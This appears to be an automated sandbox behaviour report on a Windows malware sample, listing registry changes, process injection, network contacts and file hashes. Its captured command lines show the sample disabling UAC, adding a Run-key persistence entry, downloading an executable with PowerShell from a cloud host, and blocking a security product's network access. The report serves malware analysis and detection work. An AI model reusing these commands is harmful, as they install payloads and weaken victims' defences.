Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\programdata\20250223024202\Agghosts.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\Videos\bin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\programdata\20250223024202\Agghosts.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\programdata\20250223024202\Agghosts.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\ = "URL:TonSite Link" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\URL Protocol C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\URL Protocol C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\ = "URL:Telegram Link" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\programdata\20250223024202\Agghosts.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 396 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 396 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 396 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024202\Agghosts.exe
PID 396 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024202\Agghosts.exe
PID 396 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024202\Agghosts.exe
PID 4412 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4412 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 396 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 396 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 396 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 396 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 396 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 396 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 1500 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1500 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2524 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1500 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1500 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2524 wrote to memory of 4556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 4556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 4832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 4832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 3936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 3936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 2792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 2792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 3968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 3968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 2380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 2380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1500 wrote to memory of 4084 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Videos\bin.exe
PID 1500 wrote to memory of 4084 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Videos\bin.exe
PID 1500 wrote to memory of 4084 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Videos\bin.exe
PID 4084 wrote to memory of 1712 N/A C:\Users\Public\Videos\bin.exe C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp
PID 4084 wrote to memory of 1712 N/A C:\Users\Public\Videos\bin.exe C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp
PID 4084 wrote to memory of 1712 N/A C:\Users\Public\Videos\bin.exe C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp
PID 1712 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
PID 1712 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024202\1.bat" "

C:\programdata\20250223024202\Agghosts.exe

"C:\programdata\20250223024202\Agghosts.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024202\fhq.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile settings inboundusernotification disable

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile settings inboundusernotification disable

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile settings inboundusernotification disable

C:\Users\Public\Videos\bin.exe

"C:\Users\Public\Videos\bin.exe"

C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp" /SL5="$1301F8,46193823,827904,C:\Users\Public\Videos\bin.exe"

C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe

"C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 baba-1336130708.cos.ap-tokyo.myqcloud.com udp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
N/A 127.0.0.1:56118 tcp
US 8.8.8.8:53 www.baidu.com udp
CN 103.235.47.188:80 www.baidu.com tcp
US 8.8.8.8:53 spoutry.it.com udp
JP 118.107.15.176:8081 spoutry.it.com tcp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
NL 149.154.167.51:443 tcp
NL 95.161.76.100:443 tcp
NL 149.154.167.51:80 149.154.167.51 tcp
NL 95.161.76.100:80 95.161.76.100 tcp
US 8.8.8.8:53 td.telegram.org udp
NL 149.154.167.99:443 td.telegram.org tcp
NL 149.154.167.91:443 tcp
NL 149.154.167.51:443 tcp
NL 95.161.76.100:443 tcp
NL 149.154.167.91:80 149.154.167.91 tcp
NL 149.154.167.51:80 149.154.167.51 tcp
NL 95.161.76.100:80 95.161.76.100 tcp
SG 149.154.171.5:443 tcp
US 8.8.8.8:53 dns.google.com udp
SG 149.154.171.5:80 149.154.171.5 tcp
US 8.8.8.8:443 dns.google.com tcp
NL 95.161.76.101:443 tcp
US 8.8.8.8:53 dns.google.com udp
US 8.8.8.8:53 dns.google.com udp
US 8.8.8.8:53 dns.google.com udp
US 8.8.8.8:53 dns.google.com udp
US 8.8.8.8:53 dns.google.com udp
US 8.8.8.8:53 dns.google.com udp
US 8.8.8.8:53 dns.google.com udp

Files

memory/396-11-0x0000000140000000-0x0000000140419000-memory.dmp

memory/396-12-0x000001E44BF00000-0x000001E44C314000-memory.dmp

memory/396-13-0x000001E44B980000-0x000001E44B981000-memory.dmp

memory/396-14-0x0000000140000000-0x0000000140419000-memory.dmp

C:\ProgramData\20250223024202\Agghosts.exe

MD5 2a24dcd41bc3c5b5f7eceda525786578
SHA1 7e898f9ee5a97a1a261326f0168e8de44dcf8af4
SHA256 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7
SHA512 aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a

C:\Users\Public\Downloads\20250223024202\1.bat

MD5 fa42ebb1071abc0e618c296ea2cf71a6
SHA1 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a
SHA256 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d
SHA512 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05

C:\programdata\20250223024202\libcef.dll

MD5 b7f8c3416cdfd6f46c790da064f66099
SHA1 d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6
SHA256 b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d
SHA512 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7

C:\ProgramData\lnk\2.lnk

MD5 97dd1e75e3378d3e5f4cb676787df4c5
SHA1 9050ff87b70c2d534c1218113a3f5e3d971b4d90
SHA256 fc567936880543449bfc3c148219e3332db05554a2bfee030cade8f0ecc6b4ee
SHA512 acf35d67939ff0281e66b1b281197a815eb932b79c18d121ec68a366509fd3aade0bde257ba0d22e9396b172d2a6915cc000a2e961fa701e9586b09d46e17655

memory/396-62-0x0000000140000000-0x0000000140419000-memory.dmp

memory/5056-63-0x0000000002BF0000-0x0000000002C19000-memory.dmp

C:\programdata\20250223024202\Ensup.log

MD5 2fd94f6e1d71454d716a126f0d7450ac
SHA1 5d966df95c741880089e9078af921a22216516ec
SHA256 a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5
SHA512 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2

C:\Users\Public\Videos\download_and_run.bat

MD5 a90ccfd040d774b547f7d258b8e03661
SHA1 c46e353d34723f9393482974a516d51dfb52440d
SHA256 d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2
SHA512 bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7

C:\Users\Public\Downloads\20250223024202\fhq.bat

MD5 3a7cb580bd340505f6dc5b4c829a3eca
SHA1 21cc730517d74fa1d13316d7e0d817f3bd710906
SHA256 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2
